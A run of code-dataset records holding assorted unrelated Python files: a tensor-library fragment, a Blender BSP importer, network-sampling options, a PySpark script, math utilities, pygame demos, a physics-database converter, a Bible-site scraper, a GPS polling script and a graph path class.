Args:\n name (str): Key representing the function stored in the ops dictionary\n function (class, inherits from Function): Value in the dictionary\n device ([type], optional): The device on which the operation is execute. Defaults to Device.CPU.\n \"\"\"\n\n Tensor.ops[device][name] = operation\n \n def dispatch(*args, **kwargs):\n \"\"\"Modifies the operation arguments and adds the operation \n to the ops dictionary\n\n Returns:\n function: Forward pass (apply) of the operation\n \"\"\"\n input = [arg for arg in args if isinstance(arg, Tensor)][0]\n args = [Tensor(np.array([arg], dtype=input.dtype), device=input.device) \n if not isinstance(arg, Tensor) else arg for arg in args]\n \n op = Tensor.ops[input.device][name]\n op.cl_ctx, op.cl_queue, op.device = cl_ctx, cl_queue, input.device # For GPU support\n return op.apply(op, *args, **kwargs)\n\n if name in ['add', 'mul', 'pow', 'matmul', 'neg']:\n setattr(Tensor, f\"__{name}__\", dispatch)\n if name != 'neg':\n setattr(Tensor, f\"__r{name}__\", lambda self, x: dispatch(x, self))\n else:\n setattr(Tensor, name, dispatch)\n\n\ndef register_ops(namespace, device=Device.CPU):\n for name, cls in inspect.getmembers(namespace, inspect.isclass):\n if name[0] != \"_\": \n register(name.lower(), cls, device=device)\n\n\nfrom nanograd.nn import ops_cpu\n\nregister_ops(ops_cpu)\n\ntry:\n import pyopencl as cl\n from nanograd.nn import ops_gpu\n register_ops(ops_gpu, device=Device.GPU)\n\n PYOPENCL_AVAILABLE = True\n\nexcept ImportError:\n PYOPENCL_AVAILABLE = False\n warnings.warn(\"PyOpenCL is not available on this computer. Can't use \\\n parallel computing. Please install it to move comptutations \\\n to move the GPU.\")\n","sub_path":"nanograd/tensor.py","file_name":"tensor.py","file_ext":"py","file_size_in_byte":17761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"214572261","text":"bl_info = {\n 'name': 'Quake BSP format',\n 'author': 'Joshua Skelton',\n 'version': (0, 0, 2),\n 'blender': (2, 79, 0),\n 'location': 'File > Import-Export',\n 'description': 'Load a Quake BSP file.',\n 'warning': '',\n 'wiki_url': '',\n 'support': 'COMMUNITY',\n 'category': 'Import-Export'}\n\nif 'bpy' in locals():\n import importlib\n\n if 'import_bsp' in locals():\n importlib.reload(import_bsp)\n if 'export_bsp' in locals():\n importlib.reload(export_bsp)\n\nimport bpy\nfrom bpy.props import (\n StringProperty,\n BoolProperty,\n FloatProperty\n)\n\nfrom bpy_extras.io_utils import (\n ImportHelper,\n ExportHelper,\n)\n\n\nclass ImportBSP(bpy.types.Operator, ImportHelper):\n \"\"\"Load a Quake BSP File\"\"\"\n\n bl_idname = 'import_scene.bsp'\n bl_label = 'Import BSP'\n bl_options = {'UNDO', 'PRESET'}\n\n filename_ext = '.bsp'\n filter_glob = StringProperty(\n default='*.bsp',\n options={'HIDDEN'},\n )\n\n global_scale = FloatProperty(\n name='Scale',\n min=0.001, max=1000.0,\n default=1.0 / 32.0,\n )\n\n use_worldspawn_entity = BoolProperty(\n name='Import Worldspawn Entity',\n description='Import worldspawn entities',\n default=True\n )\n\n use_brush_entities = BoolProperty(\n name='Import Brush Entities',\n description='Import brush entities',\n default=True\n )\n\n use_point_entities = BoolProperty(\n name='Import Point Entities',\n description='Import point entities',\n default=True\n )\n\n def execute(self, context):\n keywords = self.as_keywords(ignore=(\"filter_glob\",))\n from . import import_bsp\n\n return import_bsp.load(self, context, **keywords)\n\n def draw(self, context):\n layout = self.layout\n layout.prop(self, 'global_scale')\n layout.prop(self, 'use_worldspawn_entity')\n layout.prop(self, 'use_brush_entities')\n layout.prop(self, 'use_point_entities')\n\n\nclass ExportBSP(bpy.types.Operator, ExportHelper):\n \"\"\"Save a Quake BSP File\"\"\"\n\n bl_idname = 'export_scene.bsp'\n bl_label = 'Export BSP'\n bl_options = {'PRESET'}\n\n filename_ext = '.bsp'\n filter_glob = StringProperty(\n default='*.bsp',\n options={'HIDDEN'},\n )\n\n check_extension = True\n\n def execute(self, context):\n from . import export_bsp\n\n keywords = self.as_keywords(ignore=('axis_forward',\n 'axis_up',\n 'global_scale',\n 'check_existing',\n 'filter_glob',\n ))\n\n return export_bsp.save(self, context, **keywords)\n\n\ndef menu_func_import(self, context):\n self.layout.operator(ImportBSP.bl_idname,\n text='Quake BSP (.bsp)')\n\n\ndef menu_func_export(self, context):\n self.layout.operator(ExportBSP.bl_idname,\n text='Quake BSP (.bsp)')\n\n\ndef register():\n bpy.utils.register_module(__name__)\n\n bpy.types.INFO_MT_file_import.append(menu_func_import)\n #bpy.types.INFO_MT_file_export.append(menu_func_export)\n\n\ndef unregister():\n bpy.utils.unregister_module(__name__)\n\n bpy.types.INFO_MT_file_import.remove(menu_func_import)\n #bpy.types.INFO_MT_file_export.remove(menu_func_export)\n\n\nif __name__ == '__main__':\n register()\n","sub_path":"quake/extra/io_scene_bsp/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"117446124","text":"# -*- coding: utf-8 -*-\nimport networkx as nx\nimport os\n\nname = \"fb_100_diffRec_1.1-1.1_s500.txt\"\nprint( 'Executing Options: {}'.format(name))\n\noutfile_name = ''.join([\"/Volumes/TerraFirma/RDS/samples/\", name])\nif os.name == 'nt':\n outfile_name = os.path.normpath(os.path.join(\"R:/\", \"RDS\", \"samples\", name))\n\n# sampling parameter values\nsampling_params = {\n 'sample_size': [500], # list\n 'num_samples': 200, # int\n 'seed_count': [5], # list\n 'replacement_levels': [0], # choose with [1] or without [0] replacement or both [0, 1]\n}\n \nnot_batch_mode=True\n\nsim_params = {\n # parameter function definitions \n 'rec_activity_method': recact.rec_value_bias_random,\n 'rec_parameters': [ 0,\n [('0','1'), ([1,1,1,1,1,1,1,1,1,2], [1,1,1,1,1,1,1,1,1,2])]],\n 'rec_method': reccho.meth_random,\n 'rec_method_params': None,\n 'att_levels': [ \n ('fresh', ('0','1')),\n ('sophmore', ('0','1')),\n ('junior', ('0','1')),\n ('senior', ('0','1')),\n ] }\n\nnetworks = [\n\"American75\", \"Amherst41\", \"Auburn71\", \"BC17\", \"BU10\",\n\"Baylor93\", \"Berkeley13\", \"Bingham82\", \"Bowdoin47\",\n\"Brandeis99\", \"Brown11\", \"Bucknell39\", \"Cal65\", \"Caltech36\",\n\"Carnegie49\", \"Colgate88\", \"Columbia2\", \"Cornell5\",\n\"Dartmouth6\", \"Duke14\", \"Emory27\", \"FSU53\", \"GWU54\",\n\"Georgetown15\", \"Hamilton46\", \"Harvard1\", \"Haverford76\",\n\"Howard90\", \"Indiana69\", \"JMU79\", \"Johns Hopkins55\",\n\"Lehigh96\", \"MIT8\", \"MSU24\", \"MU78\", \"Maine59\",\n\"Maryland58\", \"Mich67\", \"Michigan23\", \"Middlebury45\",\n\"Mississippi66\", \"NYU9\", \"Northeastern19\", \"Northwestern25\",\n\"Notre Dame57\", \"Oberlin44\", \"Oklahoma97\", \"Penn94\",\n\"Pepperdine86\", \"Princeton12\", \"Reed98\", \"Rice31\",\n\"Rochester38\", \"Rutgers89\", \"Santa74\", \"Simmons81\",\n\"Smith60\", \"Stanford3\", \"Swarthmore42\", \"Syracuse56\",\n\"Temple83\", \"Tennessee95\", \"Texas80\", \"Texas84\",\n\"Trinity100\", \"Tufts18\", \"Tulane29\", \"UC33\", \"UC61\", \"UC64\",\n\"UCF52\", \"UCLA26\", \"UCSB37\", \"UCSC68\", \"UCSD34\",\n\"UChicago30\", \"UConn91\", \"UF21\", \"UGA50\", \"UIllinois20\",\n\"UMass92\", \"UNC28\", \"UPenn7\", \"USC35\", \"USF51\", \"USFCA72\",\n\"UVA16\", \"Vanderbilt48\", \"Vassar85\", \"Vermont70\",\n\"Villanova62\", \"Virginia63\", \"Wake73\", \"WashU32\",\n\"Wellesley22\", \"Wesleyan43\", \"William77\", \"Williams40\",\n\"Wisconsin87\", \"Yale4\"\n]\n\n\n#rds_iter should yield named networks\ndef rdsim_iter(network_names, sim_params):\n # parameter function definitions \n for net_name in network_names:\n net_path = os.path.normpath(\"R:/RDS/facebook_data/graphml_gc/{}_gc.graphml\".format(net_name))\n G =nx.read_graphml(net_path)\n \n for nname in G.nodes():\n G.node[nname] = {k:int(v) for k,v in G.node[nname].items()}\n \n # Trim network as appropriate\n G.remove_nodes_from([i for i in G.nodes() if G.node[i]['student']!=1])\n G.remove_nodes_from([\n i for i in G.nodes() \n if G.node[i]['year'] > 2009 or G.node[i]['year'] < 2006\n ])\n G = G.to_undirected()\n G = max(nx.connected_component_subgraphs(G), key=len)\n G.name = net_name\n \n # Assign nodes\n for node in G.nodes():\n G.node[node]['fresh'] = str(int(G.node[node]['year']==2009))\n G.node[node]['sophmore'] = str(int(G.node[node]['year']==2008))\n G.node[node]['junior'] = str(int(G.node[node]['year']==2007))\n G.node[node]['senior'] = str(int(G.node[node]['year']==2006))\n \n # RDNet may scramble node id numbers\n base_net = rds.RDNet(\n network=G,\n attLevels=sim_params['att_levels'],\n att_pairs=['fresh', 'sophmore', 'junior', 'senior']\n )\n \n cur_sim = rds.RDSim(\n RDNet=base_net, \n seeds=10, \n reclimit=base_net.network.order(), \n rec=sim_params['rec_activity_method'], \n rec_params=sim_params['rec_parameters'], \n rec_meth=sim_params['rec_method'],\n rec_meth_params=sim_params['rec_method_params']\n )\n \n base_net.clear()\n G.clear()\n\n cur_sim.reID()\n yield cur_sim\n\n# Create a generator to yield configured rdsim objects \nsims = rdsim_iter(networks, sim_params )\n\n#No Char or newlines past here","sub_path":"RDS/code/options_files/facebook/by_grade/fb_100_diffRec_1.1-1.1_s500.py","file_name":"fb_100_diffRec_1.1-1.1_s500.py","file_ext":"py","file_size_in_byte":4261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"37131970","text":"from pyspark import SparkContext, SparkConf\n\nsc = SparkContext.getOrCreate(SparkConf())\n\n# Parse the line and form key-value pair like (age, friend count)\ndef parse_line(line):\n fields = line.split(',')\n age = int(fields[2])\n friends_count = int(fields[3])\n\n return (age, friends_count)\n\n# readin the csv\nlines = sc.textFile('../dataset/fakefriends.csv')\nrdd = lines.map(parse_line)\n\n# generate key-value pair for averaging later (age, (friend count, 1))\nrdd2 = rdd.mapValues(lambda x: (x,1))\n\n# generate the key-value pair (age, (total friend, total count))\ntotal_by_age = rdd2.reduceByKey(lambda x,y: (x[0]+y[0], x[1]+y[1]))\n\n# calculate the average of the fiend count\naverage_friend_count = total_by_age.mapValues(lambda x: x[0]/x[1])\naverage_friend_count_sorted = average_friend_count.sortByKey()\n\nresults = average_friend_count_sorted.collect()\n\nfor result in results:\n print(result)\n\n","sub_path":"2_spark_basics_and_simple_examples/friends_by_age.py","file_name":"friends_by_age.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"404519841","text":"import math\n\ndef gcd(a, b):\n if a == 0:\n return b\n return (gcd(b%a, a))\n\n# Do not use this, fucking recursion\ndef phi(n):\n result = 1\n for i in range(2, n):\n if gcd(i, n) == 1:\n result += 1\n\n return result\n\ndef prime_factor(n):\n prime_factors = []\n while n % 2 == 0:\n prime_factors.append(2)\n n = n / 2\n\n for i in range(3, int(math.sqrt(n))+1,2):\n while n % i == 0:\n prime_factors.append(i)\n n = n / i\n\n if n > 2:\n prime_factors.append(n)\n\n return list(set(prime_factors))\n\n# Use this to get euler's totient\ndef euler_product(n):\n prime_factors = prime_factor(n)\n\n product = 1\n\n for p in prime_factors:\n product *= (1 - 1/p)\n\n return int(n*product)\n\nprint(euler_product(15104097))\n","sub_path":"euler_totient.py","file_name":"euler_totient.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"26192403","text":"import pygame\r\n\r\npygame.init()\r\n\r\nWHITE = (255, 255, 255)\r\nBLACK = (0, 0, 0)\r\nRED = (255, 0, 0)\r\nGREEN = (0, 255, 0)\r\nBLUE = (0, 0, 255)\r\n\r\nwindow_size = 640, 480\r\nwindow = pygame.display.set_mode(window_size)\r\nwindow.fill(BLUE)\r\n\r\npygame.display.set_caption('Intro to Game Programming')\r\n\r\nx_position = 0\r\n# since we're going to move the red rectangle in two dimensions we a variable for the y coordinate\r\ny_position = 0\r\n\r\nrunning = True\r\n\r\nwhile running:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n running = False\r\n if event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:\r\n running = False\r\n\r\n # Each time the game loop runs the value in both position variables is increased.\r\n # This now \"moves\" the red rect to the right and down at the same time.\r\n x_position += 0.1\r\n y_position += 0.1\r\n\r\n # now instead of previous hard coding use y_position for the y coordinate\r\n pygame.draw.rect(window, RED, pygame.Rect(x_position, y_position, 60, 60))\r\n pygame.display.update()\r\n\r\n window.fill(BLUE)\r\n\r\npygame.quit()","sub_path":"Python/FORR2HF05CU/Lokaverkefni/Sýniverkefni/01_PyGame/07_pygame.py","file_name":"07_pygame.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"296921096","text":"import math\n\n\ndef find_trees(course, x_move, y_move):\n course_height = len(course)\n course_width = len(course[0])\n\n x = 0\n trees = 0\n for y in range(0, course_height, y_move):\n if course[y][x % course_width] == \"#\":\n trees += 1\n x += x_move\n\n return trees\n\n\ndef solution(input_string):\n course = [list(line) for line in input_string.split(\"\\n\")]\n\n slopes = (\n (1, 1),\n (3, 1),\n (5, 1),\n (7, 1),\n (1, 2),\n )\n\n return math.prod(map(lambda i: find_trees(course, *i), slopes))\n\n\nif __name__ == \"__main__\":\n with open(\"input.txt\") as f:\n print(solution(f.read().strip()))\n","sub_path":"src/adventofcode/year2020/day5/problem2.py","file_name":"problem2.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"454184656","text":"#!/usr/bin/env python\n\n\"\"\"\n.. module:: convert\n :synopsis: used to create info.txt and the .txt files.\n\n\"\"\"\nimport sys\nimport os\nimport argparse\n\nargparser = argparse.ArgumentParser(description = \n'create info.txt, txname.txt, twiki.txt and sms.py')\nargparser.add_argument ('-utilsPath', '--utilsPath', \nhelp = 'path to the package smodels_utils',\\\ntype = str )\nargparser.add_argument ('-smodelsPath', '--smodelsPath', \nhelp = 'path to the package smodels_utils',\\\ntype = str )\nargs = argparser.parse_args()\n\nif args.utilsPath:\n utilsPath = args.utilsPath\nelse:\n databaseRoot = '../../../'\n sys.path.append(os.path.abspath(databaseRoot))\n from utilsPath import utilsPath\n utilsPath = databaseRoot + utilsPath\nif args.smodelsPath:\n sys.path.append(os.path.abspath(args.smodelsPath))\n\nsys.path.append(os.path.abspath(utilsPath))\nfrom smodels_utils.dataPreparation.inputObjects import MetaInfoInput,DataSetInput\nfrom smodels_utils.dataPreparation.databaseCreation import databaseCreator\nfrom smodels_utils.dataPreparation.massPlaneObjects import x, y, z\n\n\n\n#+++++++ global info block ++++++++++++++\ninfo = MetaInfoInput('ATLAS-CONF-2013-025')\ninfo.sqrts = '8.0'\ninfo.private = False\ninfo.lumi = '20.7'\ninfo.url = 'https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-025/'\ninfo.supersededBy = 'ATLAS-SUSY-2013-08' \ninfo.prettyName = '>= 5 (>=1 b-) jets + 2,3 SF OS leptons + Etmiss'\n\n\n#+++++++ dataset block ++++++++++++++\ndataset = DataSetInput('data')\ndataset.setInfo(dataType = 'upperLimit', dataId = None)\n\n#+++++++ next txName block ++++++++++++++\nT6ZZtt = dataset.addTxName('T6ZZtt')\nT6ZZtt.checked =\"AL\"\nT6ZZtt.constraint =\"[[['Z'],['t']],[['Z'],['t']]]\"\nT6ZZtt.conditionDescription =\"None\"\nT6ZZtt.condition =\"None\"\nT6ZZtt.source = \"ATLAS\"\n#+++++++ next mass plane block ++++++++++++++\nT6ZZttD180 = T6ZZtt.addMassPlane(2*[[x, y+180.0, y]])\nT6ZZttD180.figure = 'Figure 10'\nT6ZZttD180.figureUrl ='https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-025/figaux_10.png'\nT6ZZttD180.dataUrl = 'Not defined'\nT6ZZttD180.setSources(dataLabels= ['obsExclusion', 'obsExclusionM1', 'obsExclusionP1', 'upperLimits'],\n dataFiles= ['orig/exclusion_T6ZZttD180.txt', 'orig/exclusionm1_T6ZZttD180.txt', 'orig/exclusionp1_T6ZZttD180.txt', 'orig/T6ZZttD180.txt'],\n dataFormats= ['svg', 'svg', 'svg', 'txt'],units= [None, None, None, 'fb'])\n\n\n\ndatabaseCreator.create()\n","sub_path":"smodels-database/8TeV/ATLAS/ATLAS-CONF-2013-025/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"217071036","text":"from bs4 import BeautifulSoup\nfrom Bible import Bible\nimport requests\nimport urllib\nimport os\nimport string\n\nclass Book:\n def getInfo(self, url, abbr):\n ## Get Chapter\n chapter = ''.join(i for i in url[-3:] if i.isdigit())\n\n ## Access web site\n url = urllib.request.Request(url,headers={'User-Agent': 'Mozilla/5.0'}) \n content = urllib.request.urlopen(url).read()\n soup = BeautifulSoup(content, 'html.parser')\n\n ## Get verses Text\n verseBody = soup.find('article').find('div').find('div')\n verseRaw = verseBody.find_all('p')\n\n try:\n copyRight = verseBody.find('p', attrs={\"class\":\"MuiTypography-body2\"})\n except:\n copyRight = None\n\n if copyRight:\n verseRaw.pop()\n\n for i in range(0, len(verseRaw)):\n unwantedTag = verseRaw[i].find('sup')\n unwantedTag.extract()\n\n verse = []\n for i in range(0, len(verseRaw)):\n single_quote = \"'\"\n double_quote = '\"'\n verse.append(verseRaw[i].text.lstrip().replace(double_quote, single_quote))\n \n return verse","sub_path":"make_database/Book.py","file_name":"Book.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"570528357","text":"#!/usr/bin/python\n# Copyright (C) 2016 Berkeley Applied Analytics \n# Copyright (C) 2010 Timo Juhani Lindfors \n\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\nimport ubx\nimport struct\nimport calendar\nimport os\nimport gobject\nimport logging\nimport sys\nimport socket\nimport time\nimport signal\n\nd = {}\nstart = time.time()\nTIMEOUT = 20\nloop = gobject.MainLoop()\nstate = 0\n\ndef signal_handler(signal, frame):\n loop.quit()\n\nsignal.signal(signal.SIGINT, signal_handler)\nsignal.signal(signal.SIGHUP, signal_handler)\n\ndef timeout(*args):\n print(\"timeout\")\n loop.quit()\n\ndef poll_nav_status(*args):\n #print(\"poll_nav_status\")\n t.sendraw((\"\\xff\" * 8) + \"\\xB5\\x62\\x02\\x40\\x00\\x00\\x42\\xC8\")\n t.send(\"NAV-STATUS\", 0, [])\n\ndef poll_nav_posllh(*args):\n #print(\"poll_nav_status\")\n t.sendraw((\"\\xff\" * 8) + \"\\xB5\\x62\\x02\\x40\\x00\\x00\\x42\\xC8\")\n t.send(\"NAV-POSLLH\", 0, [])\n \ndef callback(ty, *args):\n global state\n global d\n \n print(\"callback %s %s\" % (ty, repr(args)))\n d[ty] = args\n if ty == \"NAV-STATUS\":\n if d[\"NAV-STATUS\"][0][0][\"GPSfix\"] != 0:\n #print(\"fix acquired\")\n state = 1\n poll_nav_posllh()\n else:\n #print(\"poll scheduled\")\n gobject.timeout_add(1000, poll_nav_status)\n elif state == 1 and ty == \"NAV-POSLLH\":\n print(\"%s %s %s %s %s %s\" %\n (d[\"NAV-STATUS\"][0][0][\"GPSfix\"],\n d[\"NAV-STATUS\"][0][0][\"TTFF\"] * 10**-3,\n int(time.time() - start),\n d[\"NAV-POSLLH\"][0][0][\"LAT\"] * 10**-7,\n d[\"NAV-POSLLH\"][0][0][\"LON\"] * 10**-7,\n d[\"NAV-POSLLH\"][0][0][\"Hacc\"] * 10**-3))\n \n #print(\"done\")\n loop.quit()\n\nif __name__ == \"__main__\":\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('--device', '-d', help='Specify the serial port device to communicate with. e.g. /dev/ttyO5')\n args = parser.parse_args()\n\n if args.device is not None:\n t = ubx.Parser(callback, device=args.device)\n else:\n t = ubx.Parser(callback)\n print('Polling NAV-STATUS... press CTRL-C to stop')\n poll_nav_status()\n # gobject.timeout_add(TIMEOUT * 1000, timeout)\n loop.run()\n","sub_path":"ask-position.py","file_name":"ask-position.py","file_ext":"py","file_size_in_byte":3302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"138611359","text":"#bin/python3\n\nimport sys\n\n\ndef count_transpositions(p, c):\n\n if len(p) <= 1:\n return p, c\n\n min_v = min(p)\n min_vi = p.index(min_v)\n\n if p[0] != min_v:\n # swap\n tmp = p[0]\n p[0] = min_v\n p[min_vi] = tmp\n c += 1\n\n res, c = count_transpositions(p[1:], c)\n\n return [min_v] + res, c\n\n\n# swap tile a and b\ndef swap_tiles(p, a, b):\n pass\n\n\ndef find_solution(p):\n # check if all elements are on their right places (it is enough to check N - 1 elements)\n for i in range(len(p) - 1):\n # houston, we have a problem... hostile element spotted\n if p[i] != i + 1:\n correct_element_i = p.index(i + 1)\n new_p = move_element(p, correct_element_i, i)\n\n\ndef change_empty_space(p, a):\n if a:\n p[p.index(0)] = 16\n else:\n p[p.index(16)] = 0\n\n return p \n\n\nif __name__ == \"__main__\":\n config = input()\n config = config.split(\",\") if \",\" in config else config.split()\n init_perm = list(map(int, config))\n perm = change_empty_space(init_perm.copy(), True)\n\n # check if initial permutation has solution or not\n # N of transpositions should be even\n res, c = count_transpositions(perm, 0)\n \n try:\n assert c % 2 == 0\n \n except AssertionError:\n sys.exit(\"N of transpositions is odd. Perm does not have a solution\")\n\n print(change_empty_space(res, False), c)\n\n","sub_path":"math_thinking/15puzzle.py","file_name":"15puzzle.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"264335125","text":"from graph.sparse_graph import SparseGraph\nfrom graph.dense_graph import DenseGraph\nfrom graph.sparse_graph import SparseGraphAdjIterator\nfrom graph.dense_graph import DenseGraphAdjIterator\nclass Path:\n def __init__(self, graph, s):\n self.G = graph\n self.froms = [-1 for i in range(self.G.V()) ]\n self.visited = [False for i in range(self.G.V())]\n self._dfs(s)\n def _dfs(self, v):\n self.visited[v] = True\n adjIterator = None\n if isinstance(self.G, SparseGraph):\n adjIterator = SparseGraphAdjIterator(self.G, v)\n elif isinstance(self.G, DenseGraph):\n adjIterator = DenseGraphAdjIterator(self.G, v)\n\n a = adjIterator.begin()\n while not adjIterator.end():\n if not self.visited[a]:\n self.froms[a] = v\n self._dfs(a)\n a = adjIterator.next()\n\n def has_path(self, v):\n assert v >= 0 and v < self.G.V(), \\\n \"v must be valid entry voint\"\n return self.visited[v]\n def path(self, v, vec):\n s = []\n p = v\n while p != -1:\n s.append(p)\n p = self.froms[p]\n\n vec = []\n while len(s) != 0:\n vec.append(s.pop(-1))\n\n return vec\n def show_path(self, v):\n assert v >= 0 and v < self.G.V(), \\\n \"v must be valid entry voint\"\n vec = []\n vec = self.path(v, vec)\n string = \"\"\n for i in range(len(vec)):\n string += str(vec[i])\n if i == len(vec) - 1:\n string += '\\n'\n else:\n string += \" -> \"\n print(string)","sub_path":"graph/path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"274658440","text":"from django.urls import path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom . import views\n\napp_name = 'articulos'\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('preguntas/', views.detail, name='detail'),\n path('CrearPregunta//', views.ArticuloFormA, name='ArticuloFormA'),\n path('/results/', views.results, name='results'),\n path('/results/', views.resultsH, name='resultsH'),\n\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"Openschool/articulos/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"631196187","text":"import turtle\r\nimport winsound \r\n\r\nwn=turtle.Screen()\r\nwn.title(\"Pratya's game\")\r\nwn.bgcolor(\"black\")\r\nwn.setup(width=800 ,height=600)\r\nwn.tracer(0)\r\n\r\n#paddle a\r\npaddle_a=turtle.Turtle()\r\npaddle_a.speed(0)\r\npaddle_a.shape(\"square\")\r\npaddle_a.color(\"white\")\r\npaddle_a.shapesize(stretch_wid=5,stretch_len=1)\r\npaddle_a.penup()\r\npaddle_a.goto(-350,0)\r\n\r\n\r\n\r\n#paddle b\r\npaddle_b=turtle.Turtle()\r\npaddle_b.speed(0)\r\npaddle_b.shape(\"square\")\r\npaddle_b.color(\"white\")\r\npaddle_b.shapesize(stretch_wid=5,stretch_len=1)\r\npaddle_b.penup()\r\npaddle_b.goto(350,0)\r\n\r\n#ball\r\nball=turtle.Turtle()\r\nball.speed(0)\r\nball.shape(\"square\")\r\nball.color(\"white\")\r\nball.penup()\r\nball.goto(0,0)\r\nball.dx=0.4\r\nball.dy=-0.4\r\n\r\n#score\r\nscore_a=0\r\nscore_b=0\r\n\r\n#scoreboard\r\npen=turtle.Turtle()\r\npen.speed(0)\r\npen.color(\"white\")\r\npen.penup()\r\npen.hideturtle()\r\npen.goto(0,260)\r\npen.write(\"Player A: 0 Player B: 0 \", align=\"center\",font=(\"Courier\",12,\"normal\"))\r\n\r\n#result\r\nwinner=turtle.Turtle()\r\nwinner.speed(0)\r\nwinner.color(\"blue\")\r\nwinner.penup()\r\nwinner.goto(0,0)\r\nwinner.hideturtle()\r\n\r\n\r\n#movement\r\n\r\ndef paddle_a_up():\r\n\ty=paddle_a.ycor()\r\n\ty+=20\r\n\tpaddle_a.sety(y)\r\n\r\ndef paddle_a_down():\r\n\ty=paddle_a.ycor()\r\n\ty-=20\r\n\tpaddle_a.sety(y)\r\n\r\n\r\ndef paddle_b_up():\r\n\ty=paddle_b.ycor()\r\n\ty+=20\r\n\tpaddle_b.sety(y)\r\n\r\ndef paddle_b_down():\r\n\ty=paddle_b.ycor()\r\n\ty-=20\r\n\tpaddle_b.sety(y)\r\n\r\n#keyboard binding\r\nwn.listen()\r\nwn.onkeypress(paddle_a_up,\"w\")\r\nwn.onkeypress(paddle_a_down,\"s\")\r\nwn.onkeypress(paddle_b_up,\"Up\")\r\nwn.onkeypress(paddle_b_down,\"Down\")\r\n\r\n#main loop\r\nwhile True:\r\n\twn.update()\r\n\r\n\t#move the ball\r\n\tball.setx(ball.xcor() + ball.dx)\r\n\tball.sety(ball.ycor()+ ball.dy)\r\n\r\n\t#border check\r\n\tif ball.ycor()>290 :\r\n\t\tball.sety(290)\r\n\t\tball.dy*= -1\r\n\t\t\r\n\t\t\r\n\tif ball.ycor()<-290 :\r\n\t\tball.sety(-290)\r\n\t\tball.dy*= -1\r\n\t\t\r\n\r\n #miss collision and score update\r\n\tif ball.xcor()>350:\r\n\t\tball.goto(0,0)\r\n\t\tball.dx*=-1\r\n\t\tscore_a+=1\t\r\n\t\tpen.clear()\r\n\t\tpen.write(\"Player A: {} Player B: {} \".format(score_a,score_b), align=\"center\",font=(\"Courier\",12,\"normal\"))\r\n\r\n\tif ball.xcor()<-350:\r\n\t\tball.goto(0,0)\r\n\t\tball.dx*=-1\r\n\t\tscore_b+=1\r\n\t\tpen.clear()\t\r\n\t\tpen.write(\"Player A: {} Player B: {} \".format(score_a,score_b), align=\"center\",font=(\"Courier\",12,\"normal\"))\t\r\n\r\n\t\r\n\t#check collision\t\r\n\tif ball.xcor()>330 :\r\n\t\tif ball.ycor() int:\n idx = -1\n for i in range(len(nums)):\n if nums[i] > target:\n return 0\n if nums[i] == target:\n idx = i\n break\n if idx == -1:\n return 0\n for i in range(idx+1, len(nums)):\n if nums[i] != target:\n return i - idx\n return len(nums)-idx\n\n\nif __name__ == '__main__':\n print(Solution().search([5,7,7,8,8,10], 8))\n print(Solution().search([5,7,7,8,8,10], 6))","sub_path":"answers/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"364887802","text":"# Copyright 2014 